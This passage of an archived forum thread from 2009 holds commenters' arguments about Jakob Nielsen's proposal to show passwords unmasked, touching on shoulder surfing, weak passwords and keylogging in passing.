Add to this , the fact that almost EVERYBODY ( all the people I 've watched , plus myself ) will watch where their fingers are on the keyboard when entering a password , and you reach the conclusions that displaying the password on the screen as it is being typed : does not help the person typing the password , increases the chance of over-the-shoulder password discovery .
Ergo , the status quo should be kept , until change is proven necessary .
K .</tokentext>
<sentencetext>I had to explain ONCE and ONCE ONLY to my eight year old son and to my six year old daughter, that the password shows as black dots so that nobody can read the password off the screen.
It is such a simple idea, that they both understood it straight away.
Add to this, the fact that almost EVERYBODY (all the people I've watched, plus myself) will watch where their fingers are on the keyboard when entering a password, and you reach the conclusions that displaying the password on the screen as it is being typed:

does not help the person typing the password,
increases the chance of over-the-shoulder password discovery.
Ergo, the status quo should be kept, until change is proven necessary.
K.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471839</id>
	<title>I have an even better idea</title>
	<author>McNihil</author>
	<datestamp>1245922860000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>How about not showing any starts at all?</p><p>Knowing the length of the password is half the battle.</p><p>Same issue as those old POS terminals that would beep on each key pressed. Luckily they weren't beeping in different frequencies like phones.</p><p>I guess Nielsen has nothing to protect and thus surmises incorrectly this perceived inconvenience of his.</p></htmltext>
<tokenext>How about not showing any starts at all ? Knowing the length of the password is half the battle.Same issue as those old POS terminals that would beep on each key pressed .
Luckily they were n't beeping in different frequencies like phones.I guess Nielsen has nothing to protect and thus surmises incorrectly this perceived inconvenience of his .</tokentext>
<sentencetext>How about not showing any starts at all?Knowing the length of the password is half the battle.Same issue as those old POS terminals that would beep on each key pressed.
Luckily they weren't beeping in different frequencies like phones.I guess Nielsen has nothing to protect and thus surmises incorrectly this perceived inconvenience of his.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471697</id>
	<title>I, for one...</title>
	<author>Nathrael</author>
	<datestamp>1245922380000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>...am quite happy *not* to have sure nobody's looking when entering my password, thank you.</htmltext>
<tokenext>...am quite happy * not * to have sure nobody 's looking when entering my password , thank you .</tokentext>
<sentencetext>...am quite happy *not* to have sure nobody's looking when entering my password, thank you.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471327</id>
	<title>Runaway security</title>
	<author>johannesg</author>
	<datestamp>1245921180000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>1</modscore>
	<htmltext><p>About 999 times out of 1000, I'm sitting in an environment (either at home or in the office) where I really don't care if anyone sees my password. For that one time where I do care, maybe we can have a checkbox for making the password invisible while we type.</p><p>The problem with security is really that once you start down that path, nothing is ever enough - at least not to the security gestapo (motto: "our work ain't done until you can't do yours"). Stellar example: the FTP at work is configured to have a ~10s delay after logging in, "to stop the evil h4x0rz". It's driving me nuts, so I suggested accepting the first connection without any delay, and then introducing a delay for each following connection if it occurs within 10s. That way hardly anyone will be bothered by the delay, but the h4x0rz will still be unable to flood the server with their evil password-attempting ways. But nooo, that was completely unacceptable! Because it would be INSECURE! Only a long delay guarantees security!</p></htmltext>
<tokenext>About 999 times out of 1000 , I 'm sitting in an environment ( either at home or in the office ) where I really do n't care if anyone sees my password .
For that one time where I do care , maybe we can have a checkbox for making the password invisible while we type.The problem with security is really that once you start down that path , nothing is ever enough - at least not to the security gestapo ( motto : " our work ai n't done until you ca n't do yours " ) .
Stellar example : the FTP at work is configured to have a ~ 10s delay after logging in , " to stop the evil h4x0rz " .
It 's driving me nuts , so I suggested accepting the first connection without any delay , and then introducing a delay for each following connection if it occurs within 10s .
That way hardly anyone will be bothered by the delay , but the h4x0rz will still be unable to flood the server with their evil password-attempting ways .
But nooo , that was completely unacceptable !
Because it would be INSECURE !
Only a long delay guarantees security !</tokentext>
<sentencetext>About 999 times out of 1000, I'm sitting in an environment (either at home or in the office) where I really don't care if anyone sees my password.
For that one time where I do care, maybe we can have a checkbox for making the password invisible while we type.The problem with security is really that once you start down that path, nothing is ever enough - at least not to the security gestapo (motto: "our work ain't done until you can't do yours").
Stellar example: the FTP at work is configured to have a ~10s delay after logging in, "to stop the evil h4x0rz".
It's driving me nuts, so I suggested accepting the first connection without any delay, and then introducing a delay for each following connection if it occurs within 10s.
That way hardly anyone will be bothered by the delay, but the h4x0rz will still be unable to flood the server with their evil password-attempting ways.
But nooo, that was completely unacceptable!
Because it would be INSECURE!
Only a long delay guarantees security!</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472199</id>
	<title>Re:Debit card: enter digits with 3 fingers</title>
	<author>Grishnakh</author>
	<datestamp>1245923880000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>What's wrong with covering the keys with your other hand?  That's what I do when entering PINs.  I really don't care what bystanders may think about that; as far as I'm concerned, they're all potential identity thieves anyway.</p></htmltext>
<tokenext>What 's wrong with covering the keys with your other hand ?
That 's what I do when entering PINs .
I really do n't care what bystanders may think about that ; as far as I 'm concerned , they 're all potential identity thieves anyway .</tokentext>
<sentencetext>What's wrong with covering the keys with your other hand?
That's what I do when entering PINs.
I really don't care what bystanders may think about that; as far as I'm concerned, they're all potential identity thieves anyway.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471619</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472069</id>
	<title>Re:Two words</title>
	<author>Anonymous</author>
	<datestamp>1245923400000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>4</modscore>
	<htmltext><p>Well, that's the crux isn't it?</p><p>To a usability expert, expectations are your friends.  You trust them.  You believe in them.</p><p>To a security expert, expectations are your enemies.   You distrust them.  You try to figure out what they're hiding from you.</p><p>Of course, everyone agrees that what is expected and what happens *should* be the same, but I think here the securities guys have the more legitimate concern.  Mr. Nielson doesn't even considers the possibility that his expectations might be violated.  He assumes they are benign as long as they are "usually" right.</p><p>What does "usually" mean? *You the user* may "usually" type  the password where you can't be watched (although how Nielson knows this applies to me I have no idea).   But the usual case for the *criminal* is the situation where *some* user is being vulnerable.   He doesn't care about the legions of users who are not exposed to a problem.  He cares about the sufficient number of users to his purpose that are. He *seeks* what we consider negligible and makes his home there.</p><p>Suppose I design a web site with ten thousand users a day.   Suppose a certain situation comes up only 1/10 of one percent. of the time for any given user on any given day.   To a usability expert that's negligible. To a security expert, that means I'll be guaranteeing ten exposures to vulnerabilities per day. That's great for attackers. They don't care that *most* users aren't exposed to this problem *most* of the time.  They only care that *some* users will be exposed to this problem nearly *all* of the time.</p><p>All engineering is about balancing costs and benefits. But you've got to know the probabilities, and to do that right you've got to determine the right population to calculate them with.  Once we've established that the "unusual" user case is the "usual" attacker case, we have to recalculate our cost estimates.  Where an attack is extremely unlikely, Mr. Nielson is correct in saying that the increment of security that masking gives is small.  We're talking about very, very small probabilities, so the only increment we might rationally care about is dropping the probability to zero.   Since some criminals can read keystrokes from a keyboard (although by no means many), we don't achieve that.  Therefore masking is useless.</p><p>However, from the perspective of the attacker and site owner, a situation where some users are exposed to this kind of attack is quite common. It literally happens all the time for a large site.  Therefore if masking repulsed, say, 50\% of attacks (being very, very conservative), it's still worth doing if you want to keep your site secure, or care about possible violations of user privacy.</p></htmltext>
<tokenext>Well , that 's the crux is n't it ? To a usability expert , expectations are your friends .
You trust them .
You believe in them.To a security expert , expectations are your enemies .
You distrust them .
You try to figure out what they 're hiding from you.Of course , everyone agrees that what is expected and what happens * should * be the same , but I think here the securities guys have the more legitimate concern .
Mr. Nielson does n't even considers the possibility that his expectations might be violated .
He assumes they are benign as long as they are " usually " right.What does " usually " mean ?
* You the user * may " usually " type the password where you ca n't be watched ( although how Nielson knows this applies to me I have no idea ) .
But the usual case for the * criminal * is the situation where * some * user is being vulnerable .
He does n't care about the legions of users who are not exposed to a problem .
He cares about the sufficient number of users to his purpose that are .
He * seeks * what we consider negligible and makes his home there.Suppose I design a web site with ten thousand users a day .
Suppose a certain situation comes up only 1/10 of one percent .
of the time for any given user on any given day .
To a usability expert that 's negligible .
To a security expert , that means I 'll be guaranteeing ten exposures to vulnerabilities per day .
That 's great for attackers .
They do n't care that * most * users are n't exposed to this problem * most * of the time .
They only care that * some * users will be exposed to this problem nearly * all * of the time.All engineering is about balancing costs and benefits .
But you 've got to know the probabilities , and to do that right you 've got to determine the right population to calculate them with .
Once we 've established that the " unusual " user case is the " usual " attacker case , we have to recalculate our cost estimates .
Where an attack is extremely unlikely , Mr. Nielson is correct in saying that the increment of security that masking gives is small .
We 're talking about very , very small probabilities , so the only increment we might rationally care about is dropping the probability to zero .
Since some criminals can read keystrokes from a keyboard ( although by no means many ) , we do n't achieve that .
Therefore masking is useless.However , from the perspective of the attacker and site owner , a situation where some users are exposed to this kind of attack is quite common .
It literally happens all the time for a large site .
Therefore if masking repulsed , say , 50 \ % of attacks ( being very , very conservative ) , it 's still worth doing if you want to keep your site secure , or care about possible violations of user privacy .</tokentext>
<sentencetext>Well, that's the crux isn't it?To a usability expert, expectations are your friends.
You trust them.
You believe in them.To a security expert, expectations are your enemies.
You distrust them.
You try to figure out what they're hiding from you.Of course, everyone agrees that what is expected and what happens *should* be the same, but I think here the securities guys have the more legitimate concern.
Mr. Nielson doesn't even considers the possibility that his expectations might be violated.
He assumes they are benign as long as they are "usually" right.What does "usually" mean?
*You the user* may "usually" type  the password where you can't be watched (although how Nielson knows this applies to me I have no idea).
But the usual case for the *criminal* is the situation where *some* user is being vulnerable.
He doesn't care about the legions of users who are not exposed to a problem.
He cares about the sufficient number of users to his purpose that are.
He *seeks* what we consider negligible and makes his home there.Suppose I design a web site with ten thousand users a day.
Suppose a certain situation comes up only 1/10 of one percent.
of the time for any given user on any given day.
To a usability expert that's negligible.
To a security expert, that means I'll be guaranteeing ten exposures to vulnerabilities per day.
That's great for attackers.
They don't care that *most* users aren't exposed to this problem *most* of the time.
They only care that *some* users will be exposed to this problem nearly *all* of the time.All engineering is about balancing costs and benefits.
But you've got to know the probabilities, and to do that right you've got to determine the right population to calculate them with.
Once we've established that the "unusual" user case is the "usual" attacker case, we have to recalculate our cost estimates.
Where an attack is extremely unlikely, Mr. Nielson is correct in saying that the increment of security that masking gives is small.
We're talking about very, very small probabilities, so the only increment we might rationally care about is dropping the probability to zero.
Since some criminals can read keystrokes from a keyboard (although by no means many), we don't achieve that.
Therefore masking is useless.However, from the perspective of the attacker and site owner, a situation where some users are exposed to this kind of attack is quite common.
It literally happens all the time for a large site.
Therefore if masking repulsed, say, 50\% of attacks (being very, very conservative), it's still worth doing if you want to keep your site secure, or care about possible violations of user privacy.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470999</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471787</id>
	<title>reset</title>
	<author>Anonymous</author>
	<datestamp>1245922620000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>The unmasked password suggestion is idiotic, but he's right about the 'reset form data' thing, those buttons serve zero purpose</p></htmltext>
<tokenext>The unmasked password suggestion is idiotic , but he 's right about the 'reset form data ' thing , those buttons serve zero purpose</tokentext>
<sentencetext>The unmasked password suggestion is idiotic, but he's right about the 'reset form data' thing, those buttons serve zero purpose</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471853</id>
	<title>Not everything is worth protecting</title>
	<author>InsertCleverUsername</author>
	<datestamp>1245922920000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>On the one hand, this is silly.  If you don't have the mental machinery to reliably type a password, you're likely too dumb to be trusted doing online banking and other important things.</p><p>On the other hand, why do so many stupid sites need a 10+ char c0mP13X\_p@s5w0rD (hidden with asterisks) just to exchange casserole recipes with other soccer moms?</p></htmltext>
<tokenext>On the one hand , this is silly .
If you do n't have the mental machinery to reliably type a password , you 're likely too dumb to be trusted doing online banking and other important things.On the other hand , why do so many stupid sites need a 10 + char c0mP13X \ _p @ s5w0rD ( hidden with asterisks ) just to exchange casserole recipes with other soccer moms ?</tokentext>
<sentencetext>On the one hand, this is silly.
If you don't have the mental machinery to reliably type a password, you're likely too dumb to be trusted doing online banking and other important things.On the other hand, why do so many stupid sites need a 10+ char c0mP13X\_p@s5w0rD (hidden with asterisks) just to exchange casserole recipes with other soccer moms?</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478875</id>
	<title>Re:Masking passwords doesn't do much</title>
	<author>mjwx</author>
	<datestamp>1246006920000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><blockquote><div><p>***ing your passwords protects against a very small hole....the situation where someone is allowed to see your screen but is searched to make sure they have no monitoring equipment, has the keyboard kept out of site, and isn't allowed to touch anything.</p></div></blockquote><p>

Lets ignore ATM's and other secure public terminals for accessing securely stored information.<br> <br>

What hashed out passwords do is force users to learn and memorise their passwords. Without this there is no point even having a locked system what so ever. In the end, most security, especially end user security is just different levels of obfuscation, after all we aren't trying to make a system bulletproof, we are trying to make a systems that's difficult enough to break into that an intruder will just give up.</p></div>
	</htmltext>
<tokenext>* * * ing your passwords protects against a very small hole....the situation where someone is allowed to see your screen but is searched to make sure they have no monitoring equipment , has the keyboard kept out of site , and is n't allowed to touch anything .
Lets ignore ATM 's and other secure public terminals for accessing securely stored information .
What hashed out passwords do is force users to learn and memorise their passwords .
Without this there is no point even having a locked system what so ever .
In the end , most security , especially end user security is just different levels of obfuscation , after all we are n't trying to make a system bulletproof , we are trying to make a systems that 's difficult enough to break into that an intruder will just give up .</tokentext>
<sentencetext>***ing your passwords protects against a very small hole....the situation where someone is allowed to see your screen but is searched to make sure they have no monitoring equipment, has the keyboard kept out of site, and isn't allowed to touch anything.
Lets ignore ATM's and other secure public terminals for accessing securely stored information.
What hashed out passwords do is force users to learn and memorise their passwords.
Without this there is no point even having a locked system what so ever.
In the end, most security, especially end user security is just different levels of obfuscation, after all we aren't trying to make a system bulletproof, we are trying to make a systems that's difficult enough to break into that an intruder will just give up.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473189</id>
	<title>SexyHaxor69</title>
	<author>Anonymous</author>
	<datestamp>1245927420000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Every once in a while I'll make a mistake such as entering my password in the user name field.  It is jarring to see the plain password.  I have an unsettled and disturbed feeling; and immediately realize I goofed.</p><p>Putting aside the shoulder surfing threat, the bullets in the password field give feedback that my secret password has been entered into the right place and the computer on the other end will try to handle it securely.  Without that feedback, I might accidently put my password in the subject field on some Internet forum. To me, it would hurt usability if the passwords weren't masked.</p><p>It is hard for me to imagine that masked passwords are a problem.  Anyone with bare minimum computer literacy expects the passwords to be masked.  I'm sure I'm not the only one who find it distracting to see their plain password.</p></htmltext>
<tokenext>Every once in a while I 'll make a mistake such as entering my password in the user name field .
It is jarring to see the plain password .
I have an unsettled and disturbed feeling ; and immediately realize I goofed.Putting aside the shoulder surfing threat , the bullets in the password field give feedback that my secret password has been entered into the right place and the computer on the other end will try to handle it securely .
Without that feedback , I might accidently put my password in the subject field on some Internet forum .
To me , it would hurt usability if the passwords were n't masked.It is hard for me to imagine that masked passwords are a problem .
Anyone with bare minimum computer literacy expects the passwords to be masked .
I 'm sure I 'm not the only one who find it distracting to see their plain password .</tokentext>
<sentencetext>Every once in a while I'll make a mistake such as entering my password in the user name field.
It is jarring to see the plain password.
I have an unsettled and disturbed feeling; and immediately realize I goofed.Putting aside the shoulder surfing threat, the bullets in the password field give feedback that my secret password has been entered into the right place and the computer on the other end will try to handle it securely.
Without that feedback, I might accidently put my password in the subject field on some Internet forum.
To me, it would hurt usability if the passwords weren't masked.It is hard for me to imagine that masked passwords are a problem.
Anyone with bare minimum computer literacy expects the passwords to be masked.
I'm sure I'm not the only one who find it distracting to see their plain password.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472053</id>
	<title>I guess he never had to make a presentation...</title>
	<author>Fallen Kell</author>
	<datestamp>1245923340000</datestamp>
	<modclass>Redundant</modclass>
	<modscore>1</modscore>
	<htmltext>I guess he had ever had to make a presentation in a conference room or lecture hall, and had to use an already in place computer which he had to log in, or had his laptop go into screen saver mode because it was on battery and you talked more than 30 seconds on a single slide. Because he would then immediately say, "Gee, I sure wish I didn't have to show the 200 people here my password." Especially since at least a large portion of those same people will likely have access to the internet and potentially the same computer network his account is and can log in even while the presentation is on-going...</htmltext>
<tokenext>I guess he had ever had to make a presentation in a conference room or lecture hall , and had to use an already in place computer which he had to log in , or had his laptop go into screen saver mode because it was on battery and you talked more than 30 seconds on a single slide .
Because he would then immediately say , " Gee , I sure wish I did n't have to show the 200 people here my password .
" Especially since at least a large portion of those same people will likely have access to the internet and potentially the same computer network his account is and can log in even while the presentation is on-going.. .</tokentext>
<sentencetext>I guess he had ever had to make a presentation in a conference room or lecture hall, and had to use an already in place computer which he had to log in, or had his laptop go into screen saver mode because it was on battery and you talked more than 30 seconds on a single slide.
Because he would then immediately say, "Gee, I sure wish I didn't have to show the 200 people here my password.
" Especially since at least a large portion of those same people will likely have access to the internet and potentially the same computer network his account is and can log in even while the presentation is on-going...</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471745</id>
	<title>Ever mistype password into login field?</title>
	<author>alset</author>
	<datestamp>1245922560000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>I can't count how many times I've blindly typed the first few characters of a password into the login field of a terminal when I thought the password field was active. I've seen the passwords of my colleagues a dozen or more times this way. Fortunately for all of us, we respect each other's privacy and no harm has come of it. But I shudder to imagine if my passwords were out in the open every time I typed without realizing who might be gazing over my shoulder.

This is a ridiculous idea.</htmltext>
<tokenext>I ca n't count how many times I 've blindly typed the first few characters of a password into the login field of a terminal when I thought the password field was active .
I 've seen the passwords of my colleagues a dozen or more times this way .
Fortunately for all of us , we respect each other 's privacy and no harm has come of it .
But I shudder to imagine if my passwords were out in the open every time I typed without realizing who might be gazing over my shoulder .
This is a ridiculous idea .</tokentext>
<sentencetext>I can't count how many times I've blindly typed the first few characters of a password into the login field of a terminal when I thought the password field was active.
I've seen the passwords of my colleagues a dozen or more times this way.
Fortunately for all of us, we respect each other's privacy and no harm has come of it.
But I shudder to imagine if my passwords were out in the open every time I typed without realizing who might be gazing over my shoulder.
This is a ridiculous idea.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28477417</id>
	<title>Stupid Nielsen</title>
	<author>JobyOne</author>
	<datestamp>1245950760000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>FTFA:<p><nobr> <wbr></nobr></p><div class="quote"><p>...a truly skilled criminal can simply look at the keyboard and note which keys are being pressed. So, password masking doesn't even protect fully against snoopers.</p> </div><p>I guess that because condoms don't <i>fully</i> protect against pregnancy/STDs we should just abandon all hope of security and go with what feels best. Raw dogging it with not even an attempt at birth control, much less STD protection.<br> <br>

Seriously, I'm tired of Jakob Nielsen, why won't he just crawl back into whatever hole he came out of?</p></div>
	</htmltext>
<tokenext>FTFA : ...a truly skilled criminal can simply look at the keyboard and note which keys are being pressed .
So , password masking does n't even protect fully against snoopers .
I guess that because condoms do n't fully protect against pregnancy/STDs we should just abandon all hope of security and go with what feels best .
Raw dogging it with not even an attempt at birth control , much less STD protection .
Seriously , I 'm tired of Jakob Nielsen , why wo n't he just crawl back into whatever hole he came out of ?</tokentext>
<sentencetext>FTFA: ...a truly skilled criminal can simply look at the keyboard and note which keys are being pressed.
So, password masking doesn't even protect fully against snoopers.
I guess that because condoms don't fully protect against pregnancy/STDs we should just abandon all hope of security and go with what feels best.
Raw dogging it with not even an attempt at birth control, much less STD protection.
Seriously, I'm tired of Jakob Nielsen, why won't he just crawl back into whatever hole he came out of?
	</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471663</id>
	<title>Re:Masking passwords doesn't do much</title>
	<author>Anonymous</author>
	<datestamp>1245922260000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>You miss the point.  The problem isn't "LEETZOR HACCKKEERRZZZ" trying to break into your account.  The problem is having your company login projected over a webcast or projector or seen by a visiting client.</p><p>A visiting program manager has enough scruples (or lacks the skills) actively tamper with your security.  However, if that same visiting manager knows he can see critical account information about his competition using the password he saw you type in, he might be tempted.</p><p>Also, I want to know how may people can tell me my password after watching me type it in.  I'd say the percentage is pretty low.</p></htmltext>
<tokenext>You miss the point .
The problem is n't " LEETZOR HACCKKEERRZZZ " trying to break into your account .
The problem is having your company login projected over a webcast or projector or seen by a visiting client.A visiting program manager has enough scruples ( or lacks the skills ) actively tamper with your security .
However , if that same visiting manager knows he can see critical account information about his competition using the password he saw you type in , he might be tempted.Also , I want to know how may people can tell me my password after watching me type it in .
I 'd say the percentage is pretty low .</tokentext>
<sentencetext>You miss the point.
The problem isn't "LEETZOR HACCKKEERRZZZ" trying to break into your account.
The problem is having your company login projected over a webcast or projector or seen by a visiting client.A visiting program manager has enough scruples (or lacks the skills) actively tamper with your security.
However, if that same visiting manager knows he can see critical account information about his competition using the password he saw you type in, he might be tempted.Also, I want to know how may people can tell me my password after watching me type it in.
I'd say the percentage is pretty low.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472383</id>
	<title>Re:Indeed lack of imagination</title>
	<author>asdfghjklqwertyuiop</author>
	<datestamp>1245924420000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><blockquote><div><p>4) How difficult is it to create a script that takes screenshots - how difficult is it to create a script that captures keyboard entry as well. Answer: the first can be done in userspace (and in the hands of an experienced script kiddie would be unnoticed), the latter usually has to go as a request to a driver, kernel or other layer that requires admin rights. This is true for Windows, Mac and (depending on your GUI) Linux</p></div></blockquote><p>Not really: <a href="http://www.deter.com/unix/software/xkey.c" title="deter.com">http://www.deter.com/unix/software/xkey.c</a> [deter.com]</p></div>
	</htmltext>
<tokenext>4 ) How difficult is it to create a script that takes screenshots - how difficult is it to create a script that captures keyboard entry as well .
Answer : the first can be done in userspace ( and in the hands of an experienced script kiddie would be unnoticed ) , the latter usually has to go as a request to a driver , kernel or other layer that requires admin rights .
This is true for Windows , Mac and ( depending on your GUI ) LinuxNot really : http : //www.deter.com/unix/software/xkey.c [ deter.com ]</tokentext>
<sentencetext>4) How difficult is it to create a script that takes screenshots - how difficult is it to create a script that captures keyboard entry as well.
Answer: the first can be done in userspace (and in the hands of an experienced script kiddie would be unnoticed), the latter usually has to go as a request to a driver, kernel or other layer that requires admin rights.
This is true for Windows, Mac and (depending on your GUI) LinuxNot really: http://www.deter.com/unix/software/xkey.c [deter.com]
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471099</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28477229</id>
	<title>Re:Two words</title>
	<author>Anonymous</author>
	<datestamp>1245949260000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Retarded doesn't even begin to describe your ability to understand the English language.</p><p>A checkbox to mask the password would mean that the password is hidden.  On by default for high-risk applications means that by default, the checkbox to mask the password would be on, meaning that by default the password would be hidden.</p></htmltext>
<tokenext>Retarded does n't even begin to describe your ability to understand the English language.A checkbox to mask the password would mean that the password is hidden .
On by default for high-risk applications means that by default , the checkbox to mask the password would be on , meaning that by default the password would be hidden .</tokentext>
<sentencetext>Retarded doesn't even begin to describe your ability to understand the English language.A checkbox to mask the password would mean that the password is hidden.
On by default for high-risk applications means that by default, the checkbox to mask the password would be on, meaning that by default the password would be hidden.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471013</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472745</id>
	<title>Re:Indeed lack of imagination</title>
	<author>SloppyElvis</author>
	<datestamp>1245925800000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>2</modscore>
	<htmltext><p><div class="quote"><p>4) How difficult is it to create a script that takes screenshots - how difficult is it to create a script that captures keyboard entry as well. Answer: the first can be done in userspace (and in the hands of an experienced script kiddie would be unnoticed), the latter usually has to go as a request to a driver, kernel or other layer that requires admin rights. This is true for Windows, Mac and (depending on your GUI) Linux</p></div><p>
hmm...
</p><p>
SetWindowsHookEx()
</p><p><nobr> <wbr></nobr>...I don't believe this requires admin rights.  Windows is designed for usability!  I could write an Internet Explorer browser add-on that superimposes over password editboxes and displays your password so you (and I) can see it!</p></div>
	</htmltext>
<tokenext>4 ) How difficult is it to create a script that takes screenshots - how difficult is it to create a script that captures keyboard entry as well .
Answer : the first can be done in userspace ( and in the hands of an experienced script kiddie would be unnoticed ) , the latter usually has to go as a request to a driver , kernel or other layer that requires admin rights .
This is true for Windows , Mac and ( depending on your GUI ) Linux hmm.. . SetWindowsHookEx ( ) ...I do n't believe this requires admin rights .
Windows is designed for usability !
I could write an Internet Explorer browser add-on that superimposes over password editboxes and displays your password so you ( and I ) can see it !</tokentext>
<sentencetext>4) How difficult is it to create a script that takes screenshots - how difficult is it to create a script that captures keyboard entry as well.
Answer: the first can be done in userspace (and in the hands of an experienced script kiddie would be unnoticed), the latter usually has to go as a request to a driver, kernel or other layer that requires admin rights.
This is true for Windows, Mac and (depending on your GUI) Linux
hmm...

SetWindowsHookEx()
 ...I don't believe this requires admin rights.
Windows is designed for usability!
I could write an Internet Explorer browser add-on that superimposes over password editboxes and displays your password so you (and I) can see it!
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471099</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478913</id>
	<title>Re:Two words</title>
	<author>TuringTest</author>
	<datestamp>1246007280000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Actually, Nielsen is *the* usability expert with the biggest empirical research group. Nielsen Consulting has published some really HUGE usability studies.</p></htmltext>
<tokenext>Actually , Nielsen is * the * usability expert with the biggest empirical research group .
Nielsen Consulting has published some really HUGE usability studies .</tokentext>
<sentencetext>Actually, Nielsen is *the* usability expert with the biggest empirical research group.
Nielsen Consulting has published some really HUGE usability studies.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471541</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471737</id>
	<title>Re:Utterly absurd!</title>
	<author>myowntrueself</author>
	<datestamp>1245922500000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>The average person, unless you put a gun to their head and MAKE them do differently, will choose a password that an 8-year-old can guess</p></div><p>No kidding.</p><p>I ran john the ripper over some of our password databases.</p><p>One of our directors had 'director' as their password.</p><p>Another director had 'ross' as their password, their husbands name.</p></div>
	</htmltext>
<tokenext>The average person , unless you put a gun to their head and MAKE them do differently , will choose a password that an 8-year-old can guessNo kidding.I ran john the ripper over some of our password databases.One of our directors had 'director ' as their password.Another director had 'ross ' as their password , their husbands name .</tokentext>
<sentencetext>The average person, unless you put a gun to their head and MAKE them do differently, will choose a password that an 8-year-old can guessNo kidding.I ran john the ripper over some of our password databases.One of our directors had 'director' as their password.Another director had 'ross' as their password, their husbands name.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471163</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473929</id>
	<title>Re:hunter2</title>
	<author>Anonymous</author>
	<datestamp>1245930840000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Darkness, did you mean to say "If someone can't remember <b>30</b> 6-8 character passwords with a <b>required</b> number thrown in there for good measure, perhaps they should not be on the internet." ??</p><p>Not that it affects me... all mine are "password1" except where "password" is still allowed. So I can remember them just fine.  Hence posting as Anonymous Coward, so you can't get into my REAL<nobr> <wbr></nobr>./ account.</p></htmltext>
<tokenext>Darkness , did you mean to say " If someone ca n't remember 30 6-8 character passwords with a required number thrown in there for good measure , perhaps they should not be on the internet .
" ?
? Not that it affects me... all mine are " password1 " except where " password " is still allowed .
So I can remember them just fine .
Hence posting as Anonymous Coward , so you ca n't get into my REAL ./ account .</tokentext>
<sentencetext>Darkness, did you mean to say "If someone can't remember 30 6-8 character passwords with a required number thrown in there for good measure, perhaps they should not be on the internet.
" ?
?Not that it affects me... all mine are "password1" except where "password" is still allowed.
So I can remember them just fine.
Hence posting as Anonymous Coward, so you can't get into my REAL ./ account.</sentencetext>
